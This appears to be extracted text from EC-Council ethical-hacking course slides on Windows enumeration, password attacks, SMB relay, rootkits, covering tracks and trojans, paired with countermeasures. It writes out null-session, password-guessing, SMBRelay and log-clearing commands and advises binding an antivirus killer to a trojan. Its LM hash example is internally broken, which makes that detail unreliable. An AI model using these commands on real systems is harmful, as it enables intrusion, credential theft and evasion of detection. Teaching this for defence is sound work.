Net Bios Null Sessions
~ The null session is often refereed to as the Holy Grail of
Windows hacking. Null Sessions take advantage of flaws
in the CIFS/SMB (Common Internet File System/
Server Messaging Block).
~ You can establish a Null Session with a Windows
(NT/2000/XP) host by logging on with a null user
name and password.
~ Using these null connections allows you to gather the
following information from the host:
• List of users and groups
• List of machines
• List of shares
• Users and host SIDs (Security Identifiers)
EC-Council
So What's the Big Deal?
~Anyone with a NetBIOS
connection to your computer
can easily get a full dump of
all your usernames, groups,
shares, permissions, policies,
services and more using the
Null user.
~The above syntax connects
to the hidden Inter Process
Communication 'share' (IPC$)
at IP address 192.34.34.2 with
the built- in anonymous user
(/u:'''') with ('''') null
password.
~The attacker now has a
channel over which to attempt
various techniques.
~The CIFS/SMB and
NetBIOS standards in
Windows 2000 include APIs
that return rich information
about a machine via TCP port
139 - even to unauthenticated
users.
C: >net use 192.34.34.2
IPC$ '''' /u: '''‘
EC-Council
Null Session Countermeasure
~ Null sessions require access to TCP 139 and/ or
TCP 445 ports.
~ You could also disable SMB services entirely on
individual hosts by unbinding WINS Client
TCP/IP from the interface.
~ Edit the registry to restrict the anonymous user.
• 1. Open regedt32, navigate to
HKLMSYSTEMCurrentControlSetLSA
• 2. Choose edit | add value
• value name: ResticAnonymous
• Data Type: REG_WORD
• Value: 2
EC-Council
NetBIOS Enumeration
~NBTscan is a program
for scanning IP networks
for NetBIOS name
information.
~For each responded host
it lists IP address,
NetBIOS computer name,
logged-in user name and
MAC address.
~ The first thing a remote attacker will try on a Windows
2000 network is to get list of hosts attached to the wire.
1. net view / domain,
2. nbstat -A <some IP>
EC-Council
Hacking Tool: DumpSec
DumpSec reveals shares over a null session with the target
computer.
EC-Council
Hacking Tool: NAT
~ The NetBIOS Auditing Tool (NAT) is designed to
explore the NetBIOS file-sharing services offered by the
target system.
~ It implements a stepwise approach to gather
information and attempt to obtain file system-level
access as though it were a legitimate local client.
~ If a NETBIOS session can be established at all via TCP
port 139, the target is declared "vulnerable“.
~ Once the session is fully set up, transactions are
performed to collect more information about the server
including any file system "shares" it offers.
EC-Council
SNMP Enumeration
~ SNMP is simple. Managers send requests to agents, and
the agents send back replies.
~ The requests and replies refer to variables accessible to
agent software.
~ Managers can also send requests to set values for
certain variables.
~ Traps let the manager know that something significant
has happened at the agent's end of things:
• a reboot
• an interface failure,
• or that something else that is potentially bad has happened.
~ Enumerating NT users via SNMP protocol is easy using
snmputil
EC-Council
SNMPutil example
EC-Council
Tool: IP Network Browser
EC-Council
SNMP Enumeration Countermeasures
~ Simplest way to prevent such activity is to remove the
SNMP agent or turn off the SNMP service.
~ If shutting off SNMP is not an option, then change the
default 'public' community name.
~ Implement the Group Policy security option called
Additional restrictions for anonymous connections.
~ Access to null session pipes and null session shares, and
IPSec filtering should also be restricted.
EC-Council
Windows 2000 DNS Zone transfer
~ For clients to locate Win 2k domain services
such as Ad and kerberos, Win 2k relies on DNS
SRV records.
~ Simple zone transfer (nslookup, ls -d
<domainname>) can enumerate lot of
interesting network information.
~ An attacker would look at the following records
closely:
• 1. Global Catalog Service (_gc._tcp_)
• 2. Domain Controllers (_ldap._tcp)
• 3. Kerberos Authentication (_kerberos._tcp)
EC-Council
Blocking Win 2k DNS Zone transfer
You can easily block
zone transfers using
the DNS property
sheet as shown here.
EC-Council
Identifying Accounts
~ Two powerful NT/2000 enumeration tools are:
• 1.sid2user
• 2.user2sid
~ They can be downloaded at (www.chem.msu.su/^rudnyi/NT/)
~ These are command line tools that look up NT SIDs from
username input and vice versa.
EC-Council
Hacking Tool: Enum
~ Available for download from http://razor.bindview.com
~ enum is a console-based Win32 information
enumeration utility.
~ Using null sessions, enum can retrieve user lists,
machine lists, share lists, name lists, group and
membership lists, password and LSA policy
information.
~ enum is also capable of rudimentary brute force
dictionary attack on individual accounts.
EC-Council
Hacking tool: Userinfo
~ Userinfo is a little function that retrieves all available
information about any known user from any NT/Win2k
system that you can hit 139 on.
~ Specifically calling the NetUserGetInfo API call at Level
3, Userinfo returns standard info like
• SID and Primary group
• logon restrictions and smart card requirements
• special group information
• pw expiration information and pw age
~ This application works as a null user, even if the RA set
to 1 to specifically deny anonymous enumeration.
EC-Council
Hacking Tool: GetAcct
~ GetAcct sidesteps "RestrictAnonymous=1" and acquires
account information on Windows NT/2000 machines.
~ Downloadable from (www.securityfriday.com)
EC-Council
Active Directory Enumeration
~ All the existing users and groups could be enumerated
with a simple LDAP query.
~ The only thing required to perform this enumeration is
to create an authenticated session via LDAP.
~ Connect to any AD server using ldp.exe port 389
~ Authenticate yourself using Guest /pr any domain
account
~ Now all the users and built in groups could be
enumerated.
EC-Council
AD Enumeration countermeasures
~ How is this possible with a simple guest account?
~ The Win 2k dcpromo installations screen prompts if the
user wants to relax access permissions on the directory
to allow legacy servers to perform lookup:
1.Permission compatible with pre-Win2k
2.Permission compatible with only with Win2k
~ Choose option 2 during AD installation.
EC-Council
Summary
~ Enumeration involves active connections to systems
and directed queries.
~ The type of information enumerated by intruders
includes network resources and shares, users and
groups and applications and banners.
~ Null sessions are used often by crackers to connect to
target systems.
~ NetBIOS and SNMP enumerations can be disguised
using tools such as snmputil, nat etc.
~ Tools such as user2sid, sid2user and userinfo can be
used to identify vulnerable user accounts.
Ethical Hacking
Module V
System Hacking
EC-Council
Module Objective
~ Understand the following
• Remote password guessing
• Eavesdropping
• Denial of Service
• Buffer overflows
• Privilege escalation
• Password cracking
• keystroke loggers
• sniffers
• Remote control and backdoors
• Port re direction
• Covering tracks
• Hiding files
EC-Council
Administrator Password Guessing
~ Assuming that NetBIOS TCP139 port is open, the most
effective method of breaking into NT/2000 is password
guessing.
~ Attempting to connect to an enumerated share (IPC$,
or C$) and trying username/password.
~ Default Admin$, C$, %Systemdrive% shares are good
starting point.
EC-Council
Performing automated password
guessing
~Performing automated password guessing is easy-simple loop using
the NT/2000 shell for command based on the standard NET USE
syntax.
~1. Create a simple username and password file.
~2. Pipe this file into FOR command
~C:> FOR /F "token=1, 2*" %i in (credentials.txt)
~do net use targetIPC$ %i /u: %j
EC-Council
Tool: Legion
~ Legion automates the password guessing in NetBIOS
sessions. Legion will scan multiple Class C IP address
ranges for Windows shares and also offers a manual
dictionary attack tool.
EC-Council
Hacking tool: NTInfoScan (now CIS)
~ NTInfoScan is a security scanner for NT 4.0 is a
vulnerability scanner that produces an HTML based
report of security issues found on the target system and
further information.
EC-Council
Password guessing Countermeasures
~ Block access to TCP and UDP ports 135-139.
~ Disable bindings to Wins client on any adapter.
~ Use complex passwords
~ Log failed logon attempts in Event viewer - Security log
full event 529 or 539 - Logon/Logoff
EC-Council
Monitoring Event Viewer Logs
~ Logging is of no use if no one ever analyzes the logs
~ VisualLast from www.foundstone.com formats the
event logs visually
EC-Council
Password Sniffing
Password guessing is hard work. Why not just sniff
credentials off the wire as users log in to a server and
then replay them to gain access?
EC-Council
Hacking Tool: LOphtcrack
~ LC4 is a password
auditing and recovery
package distributed by
@stake software. SMB
packet capture listens to
the local network
segment and captures
individual login sessions.
~ With LOphtcrack
password cracking
engine anyone can sniff
the ire for extended
periods is most
guaranteed to obtain
Administrator status in
matter of days.
EC-Council
Hacking Tool: KerbCrack
~KerbCrack consists of two programs, kerbsniff and
kerbcrack. The sniffer listens on the network and captures
Windows 2000/XP Kerberos logins. The cracker can be
used to find the passwords from the capture file using a
bruteforce attack or a dictionary attack.
EC-Council
Privilege Escalation
~ If an attacker gains
access to the network
using non-admin user
account, the next step
is to gain higher
privilege to that of an
administrator.
~ This is called privilege
escalation
EC-Council
Tool: GetAdmin
~ GetAdmin.exe is a small program that adds a user to the
local administrators group.
~ It uses low-level NT kernel routine to set a globalflag
allowing access to any running process.
~ You need to logon to the server console to execute the
program.
~ The GetAdmin.exe is run from the command line or
from a browser.
~ This only works with Nt 4.0 Service pack 3.
EC-Council
Tool: hk.exe
~ The hk.exe utility exposes a Local Procedure Call flaw in
NT.
~ A non-admin user can be escalated to administrators
group using hk.exe
EC-Council
Manual Password Cracking Algorithm
~Find a valid user
~Create a list of possible passwords
~Rank the passwords from high probability to low
~Key in each password
~If the system allows you in - Success
~Else try till success
EC-Council
Automatic Password Cracking
Algorithm
~Find a valid user
~Find encryption algorithm used
~Obtain encrypted passwords
~Create list of possible passwords
~Encrypt each word
~See if there is a match for each user ID
~Repeat steps 1 through 6
EC-Council
Password Types
~ Passwords that contain only letters.
~ Passwords that contain only numbers.
~ Passwords that contain only special characters.
~ Passwords that contain letters and numbers.
~ Passwords that contain only letters and special
characters.
~ Passwords that contain only special characters and
numbers.
~ Passwords that contain letters, special characters and
numbers.
EC-Council
Types of Password Attacks
~ Dictionary attack
~ Brute force attack
~ Hybrid attack
~ Social engineering
~ Shoulder surfing
~ Dumpster diving
EC-Council
Cracking NT/2000 passwords
~ SAM file in Windows NT/2000 contains the usernames
and encrypted passwords. The SAM file is located at
%systemroot%system32config directory
~ The file is locked when the OS is running.
• Booting to an alternate OS
– NTFSDOS (www.sysInternals.com) will mount any NTFS
partition as a logical drive.
• Backup SAM from the Repair directory
– Whenever rdisk /s is run, a compressed copy of the SAM
called SAM._ is created in %systemroot%repair. Expand
this file using c:>expand sam._sam
• Extract the hashes from the SAM
– Use LOphtcrack to hash the passwords.
EC-Council
Redirecting SMB Logon to the
Attacker
~Eavesdropping on LM
responses becomes much
easier if the attacker can
trick the victim to attempt
Windows authentication of
the attacker's choice.
~Basic trick is to send an
email message to the victim
with an embedded
hyperlink to a fraudulent
SMB server.
~When the hyperlink is
clicked, the user
unwittingly sends his
credentials over the
network.
EC-Council
Hacking Tool: SMBRelay
~ SMBRelay is essentially a SMB server that can capture
usernames and password hashes from incoming SMB
traffic.
~ It can also perform man-in-the-middle (MITM) attacks.
~ You must disable NetBIOS over TCP/IP and block ports
139 and 445.
~ Start the SMBRelay server and listen for SMB packets:
• c:>smbrelay /e
• c:>smbrelay /IL 2 /IR 2
~ An attacker can access the client machine by simply
connecting to it via relay address using: c:> net use *
<capture _ip>c$
EC-Council
SMBRelay man-in-the-middle
Scenario
~The attacker in this setting sets up a fraudulent server at
192.168.234.251, a relay address of 192.168.234.252 using /R, and a
target server address of 192.168.234.34 with /T.
c:> smbrelay /IL 2 /IR /R 192.168.234.252 /T 192.168.234.34
~When a victim client connects to the fraudulent server thinking it is
talking to the target, MITM server intercepts the call, hashes the
password and passes the connection to the target server.
EC-Council
SMBRelay Weakness &
Countermeasures
~ The problem is to convince
a victim's client to
authenticate to the MITM
server
~ You can send a malicious e-
mail message to the victim
client with an embedded
hyperlink to the SMBRelay
server's IP address.
~ Another solution is ARP
poisoning attack against
the entire segment causing
all of the systems on the
segment to authenticate
through the fraudulent
MITM server
Countermeasures
~ Configure Windows
2000 to use SMB
signing.
~ Client and server
communication will
cause it to
cryptographically sign
each block of SMB
communications.
~ These settings are found
under Security Policies
/Security Options
EC-Council
Hacking Tool: SMB Grind
SMBGrind increases the speed of LOphtcrack sessions on
sniffer dumps by removing duplication and providing a
facility to target specific users without having to edit the
dump files manually.
EC-Council
Hacking Tool: SMBDie
~ SMBDie tool crashes computers running Windows
2000/XP/NT by sending specially crafted SMB request.
EC-Council
Hacking Tool: NBTDeputy
~ NBTDeputy register a NetBIOS computer name on the
networkand is ready to respond to NetBT name-query
requests.
~ NBTdeputy helps to resolve IP address from NetBIOS
computer name. It's similar to Proxy ARP.
~ This tool works well with SMBRelay.
~ For example, SMBRelay runs on a computer as
ANONYMOUS-ONE and the IP address is 192.168.1.10
and NBTDeputy is also ran and 192.168.1.10 is specified.
SMBRelay may connect to any XP or .NET server when
the logon users access "My Network Places"
EC-Council
NeBIOS DoS Attack
~ Sending a 'NetBIOS Name Release' message to the
NetBIOS Name Service (NBNS, UDP 137) on a target
NT/2000 machine forces it to place its name in conflict
so that the system will no longer will be able to use it.
~ This will block the client from participating in the
NetBIOS network.
~ Tool: nbname
• NBName can disable entire LANs and prevent machines from
rejoining them.
• Nodes on a NetBIOS network infected by the tool will think that
their names already are being used by other machines.
EC-Council
Hacking Tool: John the Ripper
~ It is a command line tool designed to crack both Unix
and NT passwords. John is extremely fast and free
~ The resulting passwords are case insensitive and may
not represent the real mixed-case password.
EC-Council
What is LanManager Hash?
Example: Lets say your password is: '123456qwerty'
~ When this password is encrypted with LM algorithm, it is first
converted to all uppercase: '123456QWERTY'
~ The password is padded with null (blank) characters to make it 14
character length: '123456QWERTY_'
~ Before encrypting this password, 14 character string is split into
half: '123456Q and WERTY_'
~ Each string is individually encrypted and the results concatenated.
~ '123456Q' = 6BF11E04AFAB197F
'WERTY_' = F1E9FFDCC75575B15
~ The hash is 6BF11E04AFAB197FF1E9FFDCC75575B15
Note: The first half of the hash contains alpha-numeric characters and
it will take 24 hrs to crack by LOphtcrack and second half only
takes 60 seconds.
EC-Council
Password Cracking Countermeasures
~ Enforce 7-12 character
alpha-numeric
passwords.
~ Set the password change
policy to 30 days.
~ Physically isolate and
protect the server.
~ Use SYSKEY utility to
store hashes on disk.
~ Monitor the server logs
for brute force attacks on
user accounts.
EC-Council
Keystroke Loggers
~If all other attempts to
sniff out domain privileges
fail, then keystroke logger is
the solution.
~Keystroke loggers are
stealth software that sits
between keyboard
hardware and the operating
system, so that they can
record every key stroke.
~There are two types of
keystroke loggers:
• 1. Software based and
• 2. Hardware based.
EC-Council
Spy ware: Spector (www.spector.com)
~Spector is a spy ware and it will record everything anyone does on
the internet.
~Spector automatically takes hundreds of snapshots every hour, very
much like a surveillance camera. With spector, you will be able to see
exactly what your surveillance targets have been doing online and
offline.
~Spector works by taking a snapshot of whatever is on your computer
screen and saves it away in a hidden location on your computer's hard
drive.
EC-Council
Hacking Tool: eBlaster (www.spector.com)
~eBlaster lets you know
EXACTLY what your
surveillance targets are
doing on the internet even
if you are thousands of
miles away.
~eBlaster records their
emails, chats, instant
messages, websites visited
and keystrokes typed and
then automatically sends
this recorded information
to your own email address.
~Within seconds of them
sending or receiving an
email, you will receive your
own copy of that email.
EC-Council
IKS Software Keylogger
EC-Council
Hacking Tool: Hardware Key Logger
(www.keyghost.com)
~ The Hardware Key
Logger is a tiny hardware
device that can be
attached in between a
keyboard and a
computer.
~ It keeps a record of all
key strokes typed on the
keyboard. The recording
process is totally
transparent to the end
user.
EC-Council
Anti Spector (www.antispector.de)
~ This tool will detect Spector and detect them from your
system.
EC-Council
Hacking Tool: RootKit
~ What if the very code of the operating system came
under the control of the attacker?
~ The NT/2000 rootkit is built as a kernel mode driver
which can be dynamically loaded at run time.
~ The NT/2000 rootkit runs with system privileges, right
at the core of the NT kernel, so it has access to all the
resources of the operating system.
~ The rootkit can also:
• hide processes (that is, keep them from being listed)
• hide files
• hide registry entries
• intercept keystrokes typed at the system console
• issue a debug interrupt, causing a blue screen of death
• redirect EXE files
EC-Council
Planting the NT/2000 Rootkit
~The rootkit contains a kernel
mode device driver, called
_root_.sys and a launcher
program, called deploy.exe
~After gaining access to the
target system, he will copy
_root_.sys and deploy.exe
onto the target system and
execute deploy.exe
~This will install the rootkit
device driver and start it up.
The attacker later deletes
deploy.exe from the target
machine.
~ The attacker can then stop
and restart the rootkit at
will by using the
commands net stop _root
and net start _root_
~ Once the rootkit is started,
the file _root_.sys stops
appearing in the directory
listings. The rootkit
intercepts the system calls
for listing files and hides
all files beginning with
_root_ from display.
EC-Council
Rootkit Countermeasures
~Back up critical data (not
binaries!) Wipe everything clean
and reinstall OS/applications
from trusted source.
~Don’t rely on backups, because
you could be restoring from
trojaned software.
~Keep a well documented
automated installation
procedure.
~Keep availability of trusted
restoration media.
EC-Council
Covering Tracks
~ Once intruders have
successfully gained
Administrator access on
a system, they will try to
cover the detection of
their presence.
~ When all the information
of interest has been
stripped from the target,
they will install several
back doors so that easy
access can be obtained in
the future.
EC-Council
Disabling Auditing
~ First thing intruders will
do after gaining
Administrator privileges
is to disable auditing.
~ NT Resource Kit's
auditpol.exe tool can
disable auditing using
command line.
~ At the end of their stay,
the intruders will just
turn on auditing again
using auditpol.exe
EC-Council
Clearing the Event log
~ Intruders can easily wipe
out the logs in the event
viewer
~ Event viewer on the
attackers host can open,
read and clear logs of the
remote host.
~ This process will clear
logs of all records but
will leave one record
stating that the event log
has been cleared by
'Attacker'
EC-Council
Tool: elsave.exe
~ elsave.exe utility is a simple tool for clearing the event
log. The following syntax will clear the security log on
the remote server 'rovil' ( correct privileges are required
on the remote system)
~Save the system log on the local machine to d:system.log
and then clear the log:
elsave -l system -F d:system.log –C
~Save the application log on serv1 to
serv1d$application.log:
elsave -s serv1 -F d:application.log
EC-Council
Hacking Tool: WinZapper
~ Wizapper is a tool that an attacker can use to erase
event records selectively from the security log in
Windows 2000.
~ To use the program, the attacker runs winzapper.exe
and marks the event records to be deleted, then he
presses 'delete events' and 'exit'. Presto the events
disappear.
~ To sum things up: after an attacker has gained
Administrators access to the system, one simply cannot
trust the security log!
EC-Council
Evidence Eliminator
~ Evidence Eliminator is
an easy to use powerful
and flexible data
cleansing system for
Windows PC.
~ Daily use protects you
from unwanted data
becoming permanently
hidden in your PC.
~ It cleans recycle bins,
Internet cache, system
files, temp folders etc.
EC-Council
Hiding Files
~ There are two ways of hiding files in NT/2000.
• 1. Attrib
– use attrib +h [file/directory]
• 2. NTFS Alternate Data Streaming
– NTFS files system used by Windows NT, 2000 and XP has a
feature Alternate Data Streams - allow data to be stored in
hidden files that are linked to a normal visible file.
~ Streams are not limited in size and there can be more
than one stream linked to a normal file.
EC-Council
Creating Alternate Data Streams
~Start by going to the
command line and typing
notepad test.txt
~Put some data in the file,
save the file, and close
Notepad.
~From the command line,
type dir test.txt and note the
file size.
~Next, go to the command
line and type notepad
test.txt:hidden.txt Type
some text into Notepad, save
the file, and close.
~Check the file size again and
notice that it hasn’t changed!
~If you open test.txt, you see
your original data and nothing
else.
~If you use the type
command on the filename
from the command line, you
still get the original data.
~If you go to the command
line and type type
test.txt:hidden.txt you get
an error.
EC-Council
Tools: ADS creation and detection
makestrm.exe moves the physical contents of a file to its
stream.
~ ads_cat from Packet Storm is a utility for writing to NTFS's
Alternate File Streams and includes ads_extract, ads_cp,
and ads_rm, utilities to read, copy, and remove data from
NTFS alternate file streams.
~ Mark Russinovich at www.sysinternals.com has released
freeware utility Streams which displays NTFS files that have
alternate streams content.
~ Heysoft has released LADS (List Alternate Data Streams),
which scans the entire drive or a given directory. It lists the
names and size of all alternate data streams it finds.
EC-Council
NTFS Streams countermeasures
~ Deleting a stream file involves copying the 'front' file to
a FAT partition, then copying back to NTFS.
~ Streams are lost when the file is moved to FAT
Partition.
~ LNS.exe from (http://nt security.nu/cgi-
bin/download/lns.exe.pl) can detect streams.
EC-Council
Stealing Files using Word Documents
~ Anyone who saves a word document has a potentially
new security risk to consider – one that no current anti-
virus or Trojan scanner will turn up.
~ The contents of the files on victim's hard drives can be
copied and sent outside your firewall without even their
knowing.
~ The threat takes advantage of a special feature of word
called field codes.
~ Here's how it might work: Someone sends victim a
Word document with a field-code bug. The victim opens
the file in Word, saves it (even with no changes) , then
sends it back to the originator.
EC-Council
Field Code Counter measures
~Use Hidden Field
Detector. It's available free
at:
http://www.woodyswatch.c
om/util/sniff/
~Hidden field Detector
upon installation will install
itself on your Word Tools
Menu.
~It scans your documents
for potentially troublesome
field codes, which you cant
see easily and even warns
you when it finds
something suspicious.
EC-Council
What is Steganography?
~The process of hiding data
in images is called
Steganography.
~The most popular method
for hiding data in files is to
utilize graphic images as
hiding place.
~Attackers can embed
information such as:
1.Source code for hacking
tool
2.List of compromised
servers
3.Plans for future attacks
4..your grandma/s secret
cookie recipe
EC-Council
Tool : Image Hide
~ImageHide is a
steganography program. Can
Hide loads of text in images.
~Simple encrypt and decrypt
of data
~Even after adding bytes of
data, there is no increase in
image size.
~Image looks the same to
normal paint packages
~Loads and saves to files and
gets past all the mail sniffers.
EC-Council
Tool: Mp3Stego
~MP3Stego will hide information in MP3 files during the
compression process.
~The data is first compressed, encrypted and then hidden
in the MP3 bit stream.
EC-Council
Tool: Snow.exe
~ Snow is a whitespace steganography program and is
used to conceal messages in ASCII text by appending
whitespace to the end of lines.
~ Because spaces and tabs are generally not visible in text
viewers, the message is effectively hidden from casual
observers. If the built in encryption is used, the message
cannot be read even if it is detected.
EC-Council
Tool: Camera/Shy
~ Camera/Shy works with Windows and Internet
Explorer and lets users share censored or sensitive
information buried within an ordinary gif image.
~ The program lets users encrypt text with a click of the
mouse and bury the text in an image. The files can be
password protected for further security.
~ Viewers who open the pages with the Camera/Shy
browser tool can then decrypt the embedded text on the
fly by double-clicking on the image and supplying a
password.
EC-Council
Steganography Detection
~ Stegdetect is an automated tool for detecting
steganographic content in images.
~ It is capable of detecting different steganographic
methods to embed hidden information in JPEG images.
~ Stegbreak is used to launch dictionary attacks against
Jsteg-Shell, JPHide and OutGuess 0.13b.
EC-Council
Tool: dskprobe.exe
~ Windows 2000 Installation CD-ROM
~ dskprobe.exe is a low level disk editor located in
Support Tools directory.
~ Steps to read the efs temp contents:
1.Launch dskprobe and open the physical drive to read.
2.Click the Set Active button adjustment to the drive
after it populates the handle '0'.
3.Click Tools -> Search sectors and search for string
efs0.tmp (in sector 0 at the end of the disk).
4.You should select Exhaustive Search, Ignore Case
and Unicode characters.
EC-Council
Buffer overflows
~A buffer overrun is when a program allocates a block of memory of a
certain length and then tries to stuff too much data into the buffer,
with extra overflowing and overwriting possibly critical information
crucial to the normal execution of the program. Consider the following
source code:
~When the source is compiled and turned into a program and the
program is run, it will assign a block of memory 32 bytes long to hold
the name string.
Buffer overflow will occur if you enter:
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA
EC-Council
Outlook Buffer Overflow
~ There is a vulnerability in Microsoft Outlook client. The
attacker sends an e-mail with a malformed header that
causes buffer overflow to occur.
1. It will cause the victim's machine to crash or
2.Cause arbitrary code to run on the victim's computer.
~ Affects the following versions:
Microsoft Outlook versions 97/98 and 2000.
Microsoft Outlook Express 4.0, 4.01. 5.0 and 5.01
EC-Council
List of Buffer Overflow Cases
~ Netmeeting 2.x exploit
~ (http://www.cultdeadcow.com/cDc_files/cDc-351/)
~ NT RAS Exploit
~ (http://www.cerberus-infosec.co.uk/wprasbuf.html)
~ IIS Hack
~ (http://www.eeye.com)
~ Oracle Web Exploit
~ (http://www.cerberus-infosec.co.uk/advowl.html)
~ Outlook Exploit
~ (http://www.ussrback.com/labs50.html)
~ IIS .printer
~ (http://www.securityfocus.com/bid/2674)
EC-Council
Protection against Buffer Overflows
~ Buffer overflow vulnerabilities are inherent in
code due to poor or no error checking.
~ General ways of protecting against buffer
overflows:
1. Close the port of service
2. apply vendors patch or install the latest version of
the software
3. Filter specific traffic at the firewall
4. Test key application
5. Run software at the least privilege required
EC-Council
Summary
~ Hackers use a variety of means to penetrate systems.
~ Password guessing / cracking is one of the first steps.
~ Password sniffing is a preferred eavesdropping tactic.
~ Vulnerability scanning aids hacker to identify which
password cracking technique to use.
~ Key stroke logging /other spy ware tools are used as
they gain entry to systems to keep up the attacks.
~ Invariably evidence of “having been there and done the
damage” is eliminated by attackers.
~ Stealing files as well as Hiding files are means used to
sneak out sensitive information.
Ethical Hacking
Module VI
Trojans and Backdoors
EC-Council
Cheat Sheets
EC-Council
Module Objective
~ Terms of reference for various malicious code
~ Defining Trojans and backdoors
~ Understanding the various backdoor genre
~ Overview of various Trojan tools
~ Learning effective prevention methods and
countermeasures
~ Overview of Anti-Trojan software
~ Learning to generate a Trojan program
EC-Council
Trojans and Backdoors
A Trojan horse is:
~ An unauthorized program contained within a legitimate
program. This unauthorized program performs
functions unknown (and probably unwanted) by the
user.
~ A legitimate program that has been altered by the
placement of unauthorized code within it; this code
performs functions unknown (and probably
unwanted) by the user.
~ Any program that appears to perform a desirable and
necessary function but that (because of unauthorized
code within it that is unknown to the user) performs
functions unknown (and definitely unwanted) by the
user.
EC-Council
Working of Trojans
Internet
Trojaned System
Attacker
~Attacker gets access to the trojaned system as the system
goes online
~By way of the access provided by the trojan attacker can
stage attacks of different types.
EC-Council
Various Trojan Genre
~ Remote Access Trojans
~ Password Sending Trojans
~ Keyloggers
~ Destructive
~ Denial Of Service (DoS) Attack Trojans
~ Proxy/Wingate Trojans
~ FTP Trojans
~ Software Detection Killers
EC-Council
Modes of Transmission
~ ICQ
~ IRC
~ Attachments
~ Physical Access
~ Browser And E-mail Software Bugs
~ NetBIOS (File Sharing)
~ Fake Programs
~ Un-trusted Sites And Freeware Software
EC-Council
Tool: QAZ
~ It is a companion virus that can spread over the
network.
~ It also has a "backdoor" that will enable a remote user
to connect to and control the computer using port 7597.
~ It may have originally been sent out by email.
~ Rename notepad to note.com
~ Modifies the registry key:
HKLMsoftwareMicrosoftWindowsCurrentVersion
Run
EC-Council
Hacking Tool:Tini
http://ntsecurity.nu/toolbox/tini
~ It is a very tiny trojan program which is only 3 kb and
programmed in assembly language. It takes minimal
bandwidth to get on victim's computer and takes small
disk space.
~ Tini only listens on port 7777 and runs a command
prompt when someone attaches to this port. The port
number is fixed and cannot be customized. This makes
it easier for a victim system to detect by scanning for
port 7777.
~ From a tini client you can telnet to tini server at port
7777
EC-Council
Tool: Netcat
~Outbound or inbound connections, TCP or UDP, to or from any
ports
~Ability to use any local source port
~Ability to use any locally-configured network source address
~Built-in port-scanning capabilities, with randomizer
~Built-in loose source-routing capability
EC-Council
Tool: Donald Dick
Donald Dick is a tool that enables a
user to control another computer
over a network.
It uses a client server architecture
with the server residing on the
victim's computer.
The attacker uses the client to send
command through TCP or SPX to
the victim listening on a pre
defined port.
Donald Dick uses default port
either 23476 or 23477
EC-Council
Tool: SubSeven
~SubSeven is a backdoor program that enables others to gain full
access to Windows 9x systems through network connection.
~The program consists of three different components : Client
(SubSeven.exe), Server (Server.exe) and a Server configuration utility
(EditServer.exe).
~The client is a GUI used to connect to server through a network or
internet connection.
EC-Council
Tool: Back Oriffice 2000
BO2K has stealth capabilities, it will
not show up on the task list and runs
completely in hidden mode.
Back Orifice accounts for highest number
of infestations on Microsoft computers.
The BO2K server code is only 100KB. The
client program is 500KB.
Once installed on a victim PC or server
machine, BO2K gives the attacker
complete control of the system.
EC-Council
Back Oriffice Plug-ins
~ BO2K functionality can be extended using BO plug-ins.
~ BOPeep (Complete remote control snap in)
~ Encryption (Encrypts the data sent between the BO2K
GUI and the server)
~ BOSOCK32 (Provides stealth capabilities by using
ICMP instead of TCP UDP)
~ STCPIO (Provides encrypted flow control between the
GUI and the server, making the traffic more difficult to
detect on the network)
EC-Council
Tool: NetBus
EC-Council
Wrappers
~ How does an attacker get BO2K or any trojan installed
on the victim's computer? Answer: Using Wrappers
~ A wrapper attaches a given EXE application (such as
games or orifice application) to the BO2K executable.
~ The two programs are wrapped together into a single
file. When the user runs the wrapped EXE, it first
installs BO2K and then runs the wrapped application.
~ The user only sees the latter application.
One can send a birthday greeting which will install
BO2K as the user watches a birthday cake dancing
across the screen.
EC-Council
Tool: Graffiti.exe
EC-Council
Hacking Tool: Silk Rope
http://www.h2ohackerz.co.uk/ind
ex2.htm
~Silk Rope is a wrapper program
and has an easy to use user-
interface.
~Silk Rope binds BO installer with
a program of your choosing,
saving the result as a single file.
~Presently, the icon is the generic
single-file-install icon (an opening
box with a window in the
background), you can change it
with an icon utility such as
Microangelo.
EC-Council
Tool: EliteWrap
~ http://homepage.ntlworld.com/chawmp/elitewrap/
~ EliteWrap is an advanced EXE wrapper for Windows
95/98/2K/NT used for SFX archiving and secretly
installing and running programs.
~ With EliteWrap one can create a setup program that
would extract files to a directory and execute programs
or batch files to display help, copy files, etc.
EC-Council
Tool: IconPlus
IconPlus can be used to change icons in EXE files
EC-Council
Tool: Restorator
EC-Council
Packaging Tool: WordPad
EC-Council
Infecting via CD-ROM
~ When you place a CD in your CD-ROM drive, it
automatically starts with some set up interface. An
Autorun.inf file that is placed on such CD's is
responsible for this action which would look like this:
[autorun]
open=setup.exe
icon=setup.exe
~ Therefore it is quite possible that while running the real
setup program a trojan could be run very easily.
~ Turn off the Auto-Start functionality by doing the
following:
Start button-> Settings-> Control Panel-> System->
Device Manager-> CDROM-> Properties -> Settings
EC-Council
Hacking Tool: Whack-A-Mole
~ Popular delivery vehicle
for NetBus/BO servers is
a game called Whack-A-
Mole which is a single
executable called
whackamole.exe
~ Whack-A-Mole installs
the NetBus/BO server
and starts the program at
every reboot.
EC-Council
BoSniffer
~ Soon after BO appeared, a category of cleaners
emerged, claiming to be able to detect and remove BO.
~ BOSniffer turned out to be one such Trojan that in
reality installed Back Orifice under the pretext of
detecting and removing it.
~ Moreover, it would announce itself on the IRC channel
#BO_OWNED with a random username.
EC-Council
Hacking Tool: Firekiller 2000
~ FireKiller 2000 will kill (if executed) any resistant
protection software.
~ For instance, if you have Norton Anti-virus auto scan in
your taskbar, and ATGuard Firewall activated, this
program will KILL both on execution, and makes the
installations of both UNUSABLE on the hard drive; which
would require re-installation to restore.
~ It works with all major protection software like AtGuard,
Conseal, Norton Anti-Virus, McAfee Anti-Virus etc.
Tip: Use it with an exe binder to bind it to a trojan before
binding this file (trojan and firekiller 2000) to some other
dropper.
EC-Council
ICMP Tunneling
~ Covert Channels are methods in which an attacker can
hide the data in a protocol that is undetectable.
~ Covert Channels rely on techniques called tunneling,
which allows one protocol to be carried over another
protocol.
~ ICMP tunneling is a method of using ICMP echo-
request and echo-reply as a carrier of any payload an
attacker may wish to use, in an attempt to stealthily
access, or control a compromised system.
EC-Council
Hacking Tool: Loki
(www.phrack.com)
~Loki was written by daemon9 to provide shell access over ICMP
